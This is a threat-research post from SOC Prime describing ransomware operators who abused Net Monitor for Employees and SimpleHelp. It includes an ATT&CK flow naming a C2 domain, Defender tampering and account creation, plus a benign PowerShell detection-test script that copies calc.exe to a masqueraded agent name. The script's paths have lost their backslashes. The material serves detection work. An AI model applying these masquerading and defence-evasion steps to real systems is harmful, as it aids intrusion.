SOC Prime Bias: High

12 Feb 2026 18:45
newspaper icon Huntress

Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Threat actors abused Net Monitor for Employees and the SimpleHelp remote management platform to maintain persistent access to victim networks. By operating through legitimate commercial tools, the intruders blended in while downloading follow-on payloads and attempting to deploy Crazy ransomware (a VoidCrypt variant). Overlapping infrastructure—shared C2 domains and IP addresses—suggests the same operator across both incidents. The activity was profit-driven, combining credential/crypto theft monitoring with attempted ransomware extortion.

Investigation

Huntress documented two early-2026 intrusions where Net Monitor for Employees enabled reverse-shell capability and service masquerading, while SimpleHelp provided backup persistence. Analysts observed a renamed vhost.exe download, execution of winpty-agent.exe, and attempts to weaken defenses by tampering with Windows Defender settings. Initial access also involved compromised VPN credentials, and the tools were installed using silent msiexec execution. Multiple copies of the Crazy ransomware binary (encrypt.exe) were dropped, but the ransomware stage failed to run.

Mitigation

Prioritize MFA across all remote access paths, minimize privileged accounts, and segment networks to constrain lateral movement. Audit third-party admin tooling aggressively, and alert on suspicious process chains, silent msiexec installs, and service-name masquerading. Block or monitor known C2 infrastructure and use application control to prevent unauthorized RMM binaries from executing.

Response

If detected, isolate affected systems, stop malicious processes, and remove unauthorized RMM services. Preserve key artifacts (binaries, installer traces, logs), block related C2 domains/IPs, and reset any compromised credentials. Perform an environment-wide inventory of admin tools to validate legitimacy, then remediate registry changes and undo any Defender-tampering or security-control disablement attempts.

"graph TB %% Class Definitions classDef technique fill:#e0f7fa classDef tool fill:#ffe0b2 classDef process fill:#d1c4e9 %% Nodes step1["<b>Technique</b> – T1078 Valid Accounts<br/>Compromised vendor SSL VPN credentials used for remote access."] class step1 technique step2["<b>Technique</b> – T1021.001 Remote Services: Remote Desktop Protocol<br/>RDP used to access domain controller."] class step2 technique step3["<b>Technique</b> – T1218.007 System Binary Proxy Execution: Msiexec<br/>Silently installed Net Monitor for Employees MSI."] class step3 technique tool_msiexec["<b>Tool</b> – Msiexec<br/><b>Purpose</b>: Install MSI packages"] class tool_msiexec tool step4["<b>Technique</b> – T1036 Masquerading<br/>Service registered as OneDriveSvc, process renamed OneDriver.exe then svchost.exe."] class step4 technique step5["<b>Technique</b> – T1136.002 Create Account: Domain Account<br/>Enabled builtu2011in Administrator and created new accounts."] class step5 technique step5b["<b>Technique</b> – T1136.001 Create Account: Local Account"] class step5b technique step5c["<b>Technique</b> – T1098.007 Additional Local or Domain Groups<br/>Added accounts to privileged groups."] class step5c technique step6["<b>Technique</b> – T1012 Query Registry<br/>Modified registry to disable Windows Defender."] class step6 technique step6b["<b>Technique</b> – T1553 Subvert Trust Controls<br/>Disabled security controls."] class step6b technique step7["<b>Technique</b> – T1059.001 PowerShell<br/>Used winptyu2011agent.exe to download vhost.exe (SimpleHelp)."] class step7 technique tool_winpty["<b>Tool</b> – winptyu2011agent.exe<br/><b>Function</b>: PowerShell payload downloader"] class tool_winpty tool malware_simplehelp["<b>Malware</b> – vhost.exe (SimpleHelp)"] class malware_simplehelp process step8["<b>Technique</b> – T1102 Web Service<br/>Bidirectional and Oneu2011Way communications via HTTPS with domain fronting."] class step8 technique step8b["<b>Technique</b> – T1090.004 Domain Fronting<br/>HTTPS traffic to dronemaker.org and other gateways."] class step8b technique step9["<b>Technique</b> – T1087.001 Account Discovery: Local Account<br/>Enumerated local accounts via net commands."] class step9 technique step9b["<b>Technique</b> – T1087.002 Account Discovery: Domain Account<br/>Enumerated domain accounts."] class step9b technique step10["<b>Technique</b> – T1486 Data Encrypted for Impact<br/>Attempted deployment of Crazy ransomware."] class step10 technique malware_crazy["<b>Malware</b> – Crazy ransomware"] class malware_crazy process step10b["<b>Technique</b> – T1027.009 Obfuscated Files or Information: Embedded Payloads<br/>Multiple encrypted binaries."] class step10b technique step11["<b>Technique</b> – T1574.010 Hijack Execution Flow: Services File Permissions Weakness<br/>Renamed binaries and services to appear legitimate."] class step11 technique %% Connections step1 –>|leads_to| step2 step2 –>|leads_to| step3 step3 –>|uses| tool_msiexec step3 –>|leads_to| step4 step4 –>|leads_to| step5 step5 –>|related_to| step5b step5b –>|related_to| step5c step5c –>|leads_to| step6 step6 –>|modifies| step6b step6b –>|leads_to| step7 step7 –>|uses| tool_winpty tool_winpty –>|downloads| malware_simplehelp malware_simplehelp –>|leads_to| step8 step8 –>|uses| step8b step8b –>|leads_to| step9 step9 –>|leads_to| step9b step9b –>|leads_to| step10 step10 –>|delivers| malware_crazy malware_crazy –>|related_to| step10b step10b –>|leads_to| step11 "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Preparation: The attacker copies a benign Windows binary (calc.exe) to a file named nmep_agtconfig.exe, a watched suffix representing the SimpleHelp agent.
    2. Execution: The renamed binary is launched, causing Sysmon to log a process creation event whose Image ends with nmep_agtconfig.exe.
    3. Post‑execution: The attacker optionally runs a PowerShell one‑liner from within the spawned process to simulate command execution (illustrating T1059), but this extra behavior is not required for the rule to fire.

  • Regression Test Script:

    # Simulation script – triggers the Sigma rule
$src = "$env:SystemRootSystem32calc.exe"
$dst = "$env:Tempnmep_agtconfig.exe"

# Copy calc.exe to the masqueraded name
Copy-Item -Path $src -Destination $dst -Force

# Execute the masqueraded binary
$proc = Start-Process -FilePath $dst -PassThru

# Optional: within the same session, run a harmless command to generate command‑line telemetry
Start-Process -FilePath "powershell.exe" -ArgumentList '-NoProfile -Command "Write-Host Simulated payload."' -NoNewWindow

# Output PID for cleanup
Write-Output "Spawned PID: $($proc.Id)"

  • Cleanup Commands:

    # Terminate the masqueraded process if still running
Get-Process -Name "nmep_agtconfig" -ErrorAction SilentlyContinue | Stop-Process -Force

# Remove the file from disk
Remove-Item -Path "$env:Tempnmep_agtconfig.exe" -Force

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free